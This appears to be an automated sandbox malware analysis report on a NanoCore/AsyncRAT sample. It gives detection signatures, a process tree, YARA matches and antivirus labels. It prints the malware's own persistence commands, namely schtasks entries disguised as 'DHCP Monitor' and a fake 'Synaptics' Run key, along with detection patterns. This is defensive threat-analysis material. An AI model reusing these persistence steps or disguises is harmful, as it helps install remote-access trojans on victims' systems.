
Windows Analysis Report
y8kdmHi6x3.exe

Overview

General Information

Sample Name: y8kdmHi6x3.exe
Analysis ID: 560001
MD5: bff363a92ac43ff249652a83dadc02ab
SHA1: 3c7b47a3f4dc3c8555b656505244886cb3a172f5
SHA256: d054e33de2d63966c68b44dd1d1de8a9b7abb76781100fe82423c80e112d4580
Tags: exe, NanoCore, RAT

Detection

Nanocore AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AsyncRAT
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Drops PE files to the document folder of the user
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Sigma detected: Suspicius Add Task From User AppData Temp
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to detect sandboxes (mouse cursor move detection)
Sigma detected: Autorun Keys Modification

Classification

  • System is w10x64
  • y8kdmHi6x3.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\y8kdmHi6x3.exe" MD5: BFF363A92AC43FF249652A83DADC02AB)
    • y8kdmHi6x3.exe (PID: 4844 cmdline: C:\Users\user\Desktop\y8kdmHi6x3.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
      • ._cache_y8kdmHi6x3.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
        • SYSTEM32.EXE (PID: 6952 cmdline: "C:\Users\user\Desktop\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
        • WINDOWS.EXE (PID: 7016 cmdline: "C:\Users\user\Desktop\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
          • ._cache_WINDOWS.EXE (PID: 6580 cmdline: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
            • schtasks.exe (PID: 3752 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 7132 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Synaptics.exe (PID: 4928 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: BFF363A92AC43FF249652A83DADC02AB)
            • Synaptics.exe (PID: 4964 cmdline: C:\ProgramData\Synaptics\Synaptics.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
              • ._cache_Synaptics.exe (PID: 1464 cmdline: "C:\Users\user\Desktop\._cache_Synaptics.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
                • SYSTEM32.EXE (PID: 6372 cmdline: "C:\Users\user\Desktop\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
                • WINDOWS.EXE (PID: 6224 cmdline: "C:\Users\user\Desktop\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
                  • ._cache_WINDOWS.EXE (PID: 6476 cmdline: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
      • Synaptics.exe (PID: 6964 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: BFF363A92AC43FF249652A83DADC02AB)
        • Synaptics.exe (PID: 5684 cmdline: C:\ProgramData\Synaptics\Synaptics.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
          • ._cache_Synaptics.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\._cache_Synaptics.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
            • SYSTEM32.EXE (PID: 6984 cmdline: "C:\Users\user\Desktop\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
            • WINDOWS.EXE (PID: 7044 cmdline: "C:\Users\user\Desktop\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
              • ._cache_WINDOWS.EXE (PID: 6792 cmdline: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
          • WerFault.exe (PID: 6540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 3668 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • Synaptics.exe (PID: 6632 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: BFF363A92AC43FF249652A83DADC02AB)
    • Synaptics.exe (PID: 5976 cmdline: C:\ProgramData\Synaptics\Synaptics.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
      • ._cache_Synaptics.exe (PID: 5984 cmdline: "C:\ProgramData\Synaptics\._cache_Synaptics.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
        • SYSTEM32.EXE (PID: 6064 cmdline: "C:\ProgramData\Synaptics\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
        • WINDOWS.EXE (PID: 2256 cmdline: "C:\ProgramData\Synaptics\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
          • ._cache_WINDOWS.EXE (PID: 672 cmdline: "C:\ProgramData\Synaptics\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
  • ._cache_WINDOWS.EXE (PID: 6692 cmdline: C:\Users\user\Desktop\._cache_WINDOWS.EXE 0 MD5: 568E6A074378730CEE0947C4C796372D)
  • dhcpmon.exe (PID: 5244 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 568E6A074378730CEE0947C4C796372D)
  • EXCEL.EXE (PID: 6564 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\._cache_WINDOWS.EXE | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\Desktop\._cache_WINDOWS.EXE | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\Desktop\._cache_WINDOWS.EXE | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
C:\Users\user\Desktop\._cache_WINDOWS.EXE | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
(26 entries in total; the remaining entries are not shown)
Source | Rule | Description | Author | Strings
00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q
0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
(319 entries in total; the remaining entries are not shown)
Source | Rule | Description | Author | Strings
11.0.._cache_WINDOWS.EXE.5b0000.0.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
11.0.._cache_WINDOWS.EXE.5b0000.0.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
11.0.._cache_WINDOWS.EXE.5b0000.0.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
11.0.._cache_WINDOWS.EXE.5b0000.0.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
15.2.Synaptics.exe.4ebff6c.4.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(895 entries in total; the remaining entries are not shown)

            AV Detection

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            E-Banking Fraud

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            System Summary

Source: Process started | Author: frack113 | Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" , ParentImage: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ParentProcessId: 6580, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp, ProcessId: 3752
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\y8kdmHi6x3.exe, ProcessId: 4844, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

            Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Remote Access Functionality

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            AV Detection

Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: HEUR/AGEN.1109339
Source: C:\Users\user\AppData\Local\Temp\RCX831F.tmp | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\Desktop\WINDOWS.EXE | Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Desktop\WINDOWS.EXE | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\Desktop\WINDOWS.EXE | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Desktop\._cache_Synaptics.exe | Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Desktop\._cache_Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Desktop\._cache_Synaptics.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\SYSTEM32.EXE | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RCX788E.tmp | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe | Avira: detection malicious, Label: HEUR/AGEN.1109339
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe | Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Documents\BNAGMGSPLO\~$cache1 | Avira: detection malicious, Label: HEUR/AGEN.1109339
Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: Yara match | File source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
